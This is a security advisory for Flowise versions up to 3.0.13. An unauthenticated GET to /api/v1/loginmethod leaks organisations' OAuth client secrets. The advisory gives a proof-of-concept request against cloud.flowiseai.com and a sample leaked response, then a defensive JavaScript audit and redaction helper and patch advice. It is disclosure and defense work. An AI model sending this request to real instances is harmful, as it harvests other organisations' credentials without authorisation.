GHSA-6pcv-j4jx-m4vx

GHSA-6pcv-j4jx-m4vx MEDIUM
Published April 16, 2026


Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| flowise | npm | <= 3.0.13 | 3.1.0 |


Severity & Risk

- CVSS 3.1: 5.3 / 10
- EPSS: N/A
- Exploitation Status: No known exploitation
- Sophistication: N/A

Attack Surface

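- AV (Attack Vector): Network
- AC (Attack Complexity): Low
- PR (Privileges Required): None
- UI (User Interaction): None
- S (Scope): Unchanged
- C (Confidentiality): Low
- I (Integrity): None
- A (Availability): None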

Recommended Action

Patch available

Update flowise to version 3.1.0


Frequently Asked Questions

What is GHSA-6pcv-j4jx-m4vx?

Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request

Is GHSA-6pcv-j4jx-m4vx actively exploited?

No confirmed active exploitation of GHSA-6pcv-j4jx-m4vx has been reported, but organizations should still patch proactively.

How to fix GHSA-6pcv-j4jx-m4vx?

Update to patched version: flowise 3.1.0.

What is the CVSS score for GHSA-6pcv-j4jx-m4vx?

GHSA-6pcv-j4jx-m4vx has a CVSS v3.1 base score of 5.3 (MEDIUM).

Technical Details

NVD Description

### Summary

I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.

### PoC

The following request can be sent by anyone on the internet without any cookies or authorization headers.

Request

```http
GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json
```

Response: The server returns 200 OK with sensitive credentials:

```json
{
  "providers": [
    {
      "id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "azure",
      "config": { "tenantID": "", "clientID": "", "clientSecret": "" },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "google",
      "config": { "clientID": "123455", "clientSecret": "123455" },
      "status": "enable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "auth0",
      "config": { "domain": "", "clientID": "", "clientSecret": "" },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "github",
      "config": { "clientID": "", "clientSecret": "" },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    }
  ],
  "callbacks": [
    { "providerName": "azure", "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback" },
    { "providerName": "google", "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback" },
    { "providerName": "auth0", "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback" },
    { "providerName": "github", "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback" }
  ]
}
```

### Affected Deployments

- FlowiseAI Cloud (cloud.flowiseai.com)
- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed

### Impact

An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
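
For self-hosted operators reviewing the response shape in the description above, the following is an added example, not code from the advisory or from the Flowise project. It audits a captured `/api/v1/loginmethod` response body for non-empty secret fields and builds an allow-listed public view; the function names, the key-name heuristic and the assumption that a pre-login caller only needs provider name, status and callback URL are hypothetical.

```javascript
// Added example: hypothetical helpers, not Flowise source code.
// Field names (providers, config, clientSecret, callbacks) follow the advisory's response.
const SECRET_KEY = /secret|password|token|private/i; // assumed naming heuristic

// Audit: list provider config fields in a response body that carry a non-empty secret.
function findExposedSecrets(body) {
  const hits = [];
  for (const p of body.providers ?? []) {
    for (const [key, value] of Object.entries(p.config ?? {})) {
      if (SECRET_KEY.test(key) && typeof value === "string" && value.length > 0) {
        hits.push({ provider: p.name, field: key });
      }
    }
  }
  return hits;
}

// Mitigation sketch: build the unauthenticated view from an allow-list of fields
// (assumed to be all a login page needs) instead of deleting known-bad keys,
// so a secret field added later is not exposed by default.
function toPublicLoginMethods(body) {
  return {
    providers: (body.providers ?? []).map((p) => ({ name: p.name, status: p.status })),
    callbacks: (body.callbacks ?? []).map((c) => ({
      providerName: c.providerName,
      callbackURL: c.callbackURL,
    })),
  };
}

// Constructed sample, trimmed from the response shape shown in the advisory.
const sample = {
  providers: [
    { name: "azure", config: { tenantID: "", clientID: "", clientSecret: "" }, status: "disable" },
    { name: "google", config: { clientID: "123455", clientSecret: "123455" }, status: "enable" },
  ],
  callbacks: [
    { providerName: "google", callbackURL: "https://cloud.flowiseai.com/api/v1/google/callback" },
  ],
};

console.log(findExposedSecrets(sample)); // audit of the raw body
console.log(JSON.stringify(toPublicLoginMethods(sample))); // redacted public view
```

Any provider reported by the audit on an instance running flowise <= 3.0.13 should have its client secret rotated at the identity provider after updating to 3.1.0.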

Timeline

- Published: April 16, 2026
- Last Modified: April 16, 2026
- First Seen: April 17, 2026
